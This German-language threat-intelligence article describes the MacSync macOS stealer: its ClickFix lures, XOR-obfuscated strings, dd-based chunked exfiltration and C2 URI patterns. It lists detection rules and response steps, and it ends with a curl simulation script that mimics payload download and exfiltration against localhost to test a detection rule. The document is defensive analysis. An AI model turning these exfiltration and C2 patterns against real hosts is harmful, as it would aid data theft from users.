SOC Prime Bias: High

09 Sep 2026 10:01 UTC

MacSync macOS Stealer nutzt ClickFix-Köder zur Umgehung von Erkennungen

Author Photo
SOC Prime Team linkedin icon Folgen
MacSync macOS Stealer nutzt ClickFix-Köder zur Umgehung von Erkennungen
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

MacSync Stealer ist ein auf macOS ausgerichteter Malware-as-a-Service (MaaS), der sich auf den ClickFix-Stil der sozialen Ingenieurskunst verlässt, um Benutzer dazu zu bringen, bösartige Terminal-Befehle auszuführen. Die Malware folgt einer modularen, mehrstufigen Ausführungskette, die Mach-O-Binärdateien, In-Memory-AppleScript-Ausführung und fragmentierte Datenexfiltration umfasst. Um der Erkennung zu entgehen, verwendet es XOR-Verschleierung, Prozessdaemonisierung und schnelles Entfernen von Forensik-Artefakten.

Untersuchung

Die Untersuchung umfasste das Reverse Engineering eines 64-Bit-Mach-O-Stagers, um seinen Ausführungsfluss und seine Ausweichtechniken zu kartieren. Forscher identifizierten eine C++-Schablonenklasse, die Einzelbyte-XOR-Verschlüsselung mit dem Schlüssel 0xAA verwendet, um funktionale Zeichenketten und C2-Endpunkte zu verschleiern. Die Analyse enthüllte auch einen fortschrittlichen Exfiltrationsmechanismus, der das dd Hilfsprogramm nutzt, um gestohlene Daten in 10 MB große Stücke zu teilen, bevor sie per HTTP-POST übertragen werden.

Minderung

Benutzer sollten geschult werden, um das Kopieren und Einfügen von Terminalbefehlen, die durch Browserfehler, gefälschte Überprüfungsseiten oder ClickFix-Pop-ups ausgelöst werden, zu vermeiden. Organisationen sollten die Terminalaktivität und unautorisierte Ausführung von osascriptgenau überwachen. Das Einschränken von nicht notarisierten Binärdateien und das Überwachen verdächtiger Dateierstellung oder Ausführung in /tmp kann die Exposition weiter reduzieren.

Reaktion

Wenn MacSync-Aktivitäten erkannt werden, sollte der betroffene macOS-Endpunkt sofort isoliert werden, um weitere Datenexfiltration zu stoppen. Responder sollten eine forensische Analyse des Verzeichnisses /tmp durchführen und ~/Library/LaunchAgents/ auf bösartige Persistenz-Plists überprüfen. Systemprotokolle sollten auch auf unautorisierte osascript Ausführung überprüft und Netzwerkverkehr auf Verbindungen zu bekannten C2-Domains überprüft werden.

Angriffsablauf

Wir aktualisieren diesen Teil noch.

Erkennungen

Verdächtiger Curl-Ausführungsversuch [MacOS] (über cmdline)

SOC Prime Team
08 Sep 2026

Archiv wurde im temporären Ordner von MacOS erstellt (über file_event)

SOC Prime Team
08 Sep 2026

IOCs (HashSha256) zur Erkennung: MacSync: Der ausweichende macOS Stealer, der ClickFix-Köder ausnutzt

SOC Prime AI-Regeln
08 Sep 2026

IOCs (HashSha1) zur Erkennung: MacSync: Der ausweichende macOS Stealer, der ClickFix-Köder ausnutzt

SOC Prime AI-Regeln
08 Sep 2026

IOCs (HashMd5) zur Erkennung: MacSync: Der ausweichende macOS Stealer, der ClickFix-Köder ausnutzt

SOC Prime AI-Regeln
08 Sep 2026

MacSync Stealer – URI-basierte Erkennung [Webserver]

SOC Prime AI-Regeln
08 Sep 2026

MacSync: Versteckte Session-Daemonisierung auf macOS [Linux Prozess-Erstellung]

SOC Prime AI-Regeln
08 Sep 2026

Simulationsausführung

Voraussetzung: Der Telemetrie- und Basislinien-Pre-Flight-Check muss bestanden haben.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Technik des Gegners (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die von der Erkennungslogik erwartete Telemetrie zu generieren. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.

  • Angriffserzählung & Befehle: Der Angreifer beabsichtigt, den Kommunikationslebenszyklus des MacSync Stealers nachzuahmen. Zuerst simuliert der Angreifer eine „Clickfix“-Täuschung, bei der die Maschine eines Opfers angewiesen wird, eine Nutzlast über eine spezielle URI herunterzuladen: /dynamic?txd=. Sobald die „Malware“ läuft, führt sie die Exfiltration durch, indem sie gestohlene Datenstücke über einen PUT Anfrage an die URI /gate?buildtxd=zurück an den C2-Server sendet. Dies simuliert genau das Muster, nach dem die Erkennungsregel sucht.

  • Regressionstest-Skript: Dieses Skript verwendet curl um die spezifischen HTTP-Anfragen zu erzeugen, die den URI-Auswahlkriterien der Sigma-Regel entsprechen.

    #!/bin/bash
    # MacSync Stealer URI Simulationsskript
    # Dieses Skript simuliert die GET- und PUT-Anfragen, die von MacSync verwendet werden
    
    TARGET_URL="http://localhost"
    
    echo "[+] Simulierung des Payload-Downloads (GET /dynamic?txd=)..."
    curl -X GET "$TARGET_URL/dynamic?txd=malicious_payload_123" -s -o /dev/null
    
    echo "[+] Simulierung der Daten-Exfiltration (PUT /gate?buildtxd=)..."
    # Simulation eines 10 MB großen Chunk-Uploads wie in der Regelbeschreibung erwähnt
    dd if=/dev/urandom of=chunk.bin bs=1M count=10 2>/dev/null
    curl -X PUT "$TARGET_URL/gate?buildtxd=exfil_data_456" 
         --data-binary @chunk.bin 
         -s -o /dev/null
    
    echo "[+] Simulation abgeschlossen."
  • Bereinigungskommandos:

    # Entfernen Sie den während der Simulation erstellten Dummy-Daten-Chunk
    rm -f chunk.bin